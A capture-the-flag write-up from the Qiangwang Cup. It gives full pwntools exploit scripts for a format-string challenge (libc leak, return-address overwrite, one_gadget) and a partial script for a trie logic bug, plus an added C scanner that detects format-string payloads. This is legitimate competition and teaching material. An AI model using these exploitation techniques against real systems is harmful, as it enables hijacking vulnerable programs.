QWB CTF (强网杯) ended at 5 o'clock yesterday. Two days of grinding, absolutely torturous.

强网先锋 (QWB Pioneer)

ez_fmt

Leak the libc base, overwrite printf's return address with start so the program runs again from the beginning, then overwrite main's return address with a one_gadget.

PS: inside printf, the %n writes have already landed before the ret instruction executes, so overwriting printf's own return address works too.

from pwn import *
context(log_level='debug',arch='amd64')
p=process('./ez_fmt')
#p=remote('47.104.24.40',1337)

p.recvuntil(b'There is a gift for you ')
stack=int(p.recv(14),16)+0x68
stack1=stack-0x70
log.success('stack => '+hex(stack))

read=0x40121B
printf=0x4011ED
start=0x4010B0
exe=0xe3afe
fake=exe+0x7fa8eb328000
p.recv()

gdb.attach(p,'b *0x401239')
pause()

payload=b'%19$p'+b'%'+str((start&0xffff)-0xe).encode('utf-8')+b'c%9$hn'
payload=payload.ljust(24,b'a')
payload+=p64(stack1)
p.send(payload)
libcbase=int(p.recv(14),16)-0x24083
log.success('libcbase => '+hex(libcbase))

exe=0xe3b01+libcbase
log.success('exe =>'+hex(exe))
p.recvuntil(b'There is a gift for you ')
stack2=int(p.recv(14),16)+0x68
log.success('stack2 =>'+hex(stack2))

payload=b'%'+str(((exe>>16)&0xff)).encode('utf-8')+b'c%10$hhn'
payload+=b'%'+str((exe&0xffff)-((exe>>16)&0xff)).encode('utf-8')+b'c%11$hn'
payload=payload.ljust(32,b'a')
payload+=p64(stack2+2)+p64(stack2)
p.send(payload)
p.interactive()
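The ez_fmt section above relies on the classic uncontrolled-format-string bug: untrusted input is passed to printf as the format itself, so %p leaks stack and libc pointers and the %n family writes to attacker-chosen addresses. As an added example (not code from the writeup or the challenge binary), the C below shows the defender's side: a small scanner that walks a string the way printf's parser would and counts conversion directives, positional `$` indices and `%n`-style writes, so untrusted text can be flagged or logged before it ever reaches a format function, next to the hardened call pattern where untrusted text is only ever an argument to a literal "%s" format. The sample inputs in main are constructed here; the function names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Result of scanning an untrusted string for printf directives. */
typedef struct {
    int directives;   /* number of % conversions, not counting the literal %% */
    int writes;       /* conversions ending in 'n': the %n / %hn / %hhn write family */
    int positional;   /* conversions that select an argument with '$' (e.g. %19$p) */
} fmt_scan_t;

/* Walk a string as printf's parser would: "%%" is a literal percent; otherwise
 * consume flags, width, precision, an optional positional index and length
 * modifiers, then record the conversion character that follows them. */
fmt_scan_t scan_format_directives(const char *s)
{
    fmt_scan_t r = {0, 0, 0};
    for (; *s; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')           /* escaped percent, harmless */
            continue;
        if (*s == '\0')          /* dangling '%' at end of input */
            break;
        int has_dollar = 0;
        /* digits, '$', flags, '.', '*' and the length modifiers h l L q j z t */
        while (*s && (isdigit((unsigned char)*s) || strchr("$-+ #.*hlLqjzt", *s))) {
            if (*s == '$')
                has_dollar = 1;
            s++;
        }
        if (*s == '\0')
            break;
        r.directives++;
        if (has_dollar)
            r.positional++;
        if (*s == 'n')
            r.writes++;
    }
    return r;
}

/* Policy helper: 1 if the input contains any conversion directive at all.
 * Text that must never be interpreted as a format has no business containing one. */
int looks_like_format_attack(const char *untrusted)
{
    fmt_scan_t r = scan_format_directives(untrusted);
    return r.directives > 0;
}

/* Hardened pattern: the format is a literal and the untrusted text is an
 * argument, so its '%' characters are printed verbatim, never interpreted.
 * Returns the number of characters the full output needs (excluding the NUL).
 * Compiling with -Wformat -Wformat-security makes gcc/clang warn on the
 * unsafe printf(untrusted) form. */
int echo_safely(char *out, size_t outsz, const char *untrusted)
{
    int n = snprintf(out, outsz, "%s", untrusted);
    return n < 0 ? 0 : n;
}

int main(void)
{
    /* constructed sample inputs; the first two mirror the shapes used in the writeup */
    const char *samples[] = { "%19$p", "%100c%9$hn", "100%% done", "hello" };
    char buf[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        fmt_scan_t r = scan_format_directives(samples[i]);
        echo_safely(buf, sizeof buf, samples[i]);
        printf("input=[%s] directives=%d positional=%d writes=%d suspicious=%d\n",
               buf, r.directives, r.positional, r.writes,
               looks_like_format_attack(samples[i]));
    }
    return 0;
}
```

The scanner is a detection aid for logs and input validation, not a substitute for the fix: the only reliable mitigation is never letting untrusted bytes become the format argument, which echo_safely shows.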

trie

Logic bug. The idea is to use add with a crafted destination IP so that the next hop gets written onto secret, call get_flag so the flag is copied over secret, and then use view to print the flag out.

The hard part is working out the right destination IP values.

Posting a half-finished writeup (to be continued…)

from pwn import *
context(log_level='debug',arch='amd64')
#p=remote(b'47.104.150.173',1337)
p=process('./trie')

gdb.attach(p,'b *$rebase(0x157E)')
pause()

def add(ip,hop):
    p.sendlineafter(b'4. Quit.\n',b'1')
    p.sendlineafter(b'Input destination IP:\n',ip)
    p.sendlineafter(b'Input the next hop:',hop)

def view(ip):
    p.sendlineafter(b'4. Quit.\n',b'2')
    p.sendlineafter(b'Input destination IP:\n',ip)

def flag():
    p.sendlineafter(b'4. Quit.\n',b'3')

add(b'1.1.1.1',b'2.2.2.2')
add(b'0.0.0.0',b'255.255.255.255') #1
add(b'128.0.0.0',b'255.255.255.255') #2
add(b'192.0.0.0',b'255.255.255.255') #4

flag()
view(b'0.0.0.0')
view(b'128.0.0.0')
view(b'192.0.0.0')

p.recv()
p.interactive()